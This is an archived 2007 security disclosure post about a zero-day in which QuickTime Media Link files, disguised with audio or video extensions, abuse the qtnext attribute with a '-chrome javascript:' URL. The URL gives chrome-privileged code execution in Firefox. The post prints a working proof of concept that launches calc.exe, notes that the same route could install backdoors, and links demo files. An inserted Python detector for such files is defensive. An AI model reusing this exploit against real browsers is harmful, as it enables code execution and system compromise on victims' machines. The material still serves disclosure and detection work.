
0DAY: QuickTime pwns Firefox

2007-09-13 00:00:00
vulners.com

published: September 12th, 2007

It seems that QuickTime media formats can be used to hack into Firefox. This vulnerability can lead to full compromise of the browser and possibly even the underlying operating system. Don't try this at home.
[Embedded media: 300 movie trailer]

Before we move on, I have to say a few things. Last year I disclosed two highly critical QuickTime vulnerabilities here and here. The first vulnerability was fixed, but the second one was completely ignored. I tried to bring the spotlight onto the second vulnerability one more time over here, yet nobody listened. So, I decided to post a demonstration of how a Low risk issue can be turned into a very easy-to-perform HIGH risk attack.

The exploit is rather simple. But first, here is a simple QTL file which instructs the browser to display a friendly alert('whats up…') message on the screen:

<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-media-link"?>
<!-- qtnext is meant to name the next media item; here it carries a javascript: URL instead -->
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up…')"/>

The most interesting thing about this simple XML file is that we can save it with a QuickTime-supported extension in order to mislead the user. If you check about:plugins you will see that QuickTime supports several media formats. We can use only the audio and video formats. This means that you can paste the above code into files with the extensions: 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au, avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qtif, rgb, rts, rtsp, sdp, sdv, sgi, snd, ulw, vfw, wav and others.

Enough theory, show me some action. The exploit that gains chrome privileges looks like this:

<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-media-link"?>
<!-- the -chrome prefix makes Firefox evaluate the javascript: URL with chrome (browser-internal) privileges -->
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

In practice I can do anything with the browser, such as installing browser backdoors, and with the operating system if the victim is running with administrative privileges. However, just for the sake of this demonstration, I simply open calc.exe. Keep in mind that the exploit is cross-platform.
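For defenders, the two properties described above (a QTL document hiding behind a media extension, and a qtnext target that is a javascript: URL, with or without the -chrome prefix) are easy to check for on a mail gateway or download scanner. The following detector is an added example and is not code from the original post; the extension set is a subset of the about:plugins list quoted above, and the sample files are constructed here, not the post's demo files.

```python
import re

# Extensions the post lists from about:plugins as handled by QuickTime (subset).
QUICKTIME_MEDIA_EXTS = {"mp3", "mov", "mpeg", "mpg", "avi", "mp4", "m4a", "wav", "aac", "3gp", "qt"}

# Marker of a QuickTime Media Link (QTL) document.
QTL_MARKER = re.compile(rb'<\?quicktime\s+type="application/x-quicktime-media-link"', re.I)
# qtnext attribute of <embed>, the field the post abuses.
QTNEXT_ATTR = re.compile(rb'<embed\b[^>]*?\bqtnext\s*=\s*"([^"]*)"', re.I | re.S)
# A qtnext target that runs code instead of loading media; -chrome is the privileged case.
CODE_TARGET = re.compile(rb"^\s*(?P<chrome>-chrome\s+)?(?:javascript|data|vbscript):", re.I)


def classify(filename: str, data: bytes) -> dict:
    """Verdict for one file: is it a QTL hiding behind a media extension, and what is qtnext?"""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    verdict = {"qtl": False, "masquerade": False, "qtnext": None, "severity": "none"}
    if QTL_MARKER.search(data[:4096]) is None:
        return verdict                        # not a QTL document (e.g. a genuine MP3)
    verdict["qtl"] = True
    verdict["masquerade"] = ext in QUICKTIME_MEDIA_EXTS   # XML where a codec header should be
    m = QTNEXT_ATTR.search(data)
    if m:
        target = m.group(1)
        verdict["qtnext"] = target.decode("latin-1", "replace")
        t = CODE_TARGET.match(target)
        if t:  # script target: chrome-privileged is critical, page-context is high
            verdict["severity"] = "critical" if t.group("chrome") else "high"
    if verdict["severity"] == "none" and verdict["masquerade"]:
        verdict["severity"] = "low"           # disguised QTL, but qtnext is a plain media URL
    return verdict


# Constructed samples (not the post's files): the alert() QTL saved as .mp3, a -chrome
# variant saved as .mov, and the first bytes of a genuine MP3 (ID3 tag) for contrast.
ALERT_QTL = (b'<?xml version="1.0"?>\n<?quicktime type="application/x-quicktime-media-link"?>\n'
             b'<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert(1)"/>\n')
CHROME_QTL = ALERT_QTL.replace(b'qtnext="javascript:', b'qtnext="-chrome javascript:')
REAL_MP3 = b"ID3\x03\x00\x00\x00\x00\x00\x00" + b"\xff\xfb\x90\x00" * 4

if __name__ == "__main__":
    for name, blob in [("BEYONCE.mp3", ALERT_QTL), ("trailer.mov", CHROME_QTL), ("song.mp3", REAL_MP3)]:
        print(name, classify(name, blob))
```

The check keys on the quicktime processing instruction rather than the extension, which is exactly the mismatch the disguise relies on; a real audio or video file never begins with that XML.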

If you dare to try this in your browser, here is a list of a few files you have to click on. They are not malicious. You have my word.
launch:
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/BEYONCE.mp3
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/pr0n0.mov
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/FunnyDog.mpeg
http://www.gnucitizen.org/projects/0day-quicktime-pwns-firefox/GhostInTheShell.avi

BTW, QuickTime comes by default with iTunes. Therefore, iTunes users are most affected.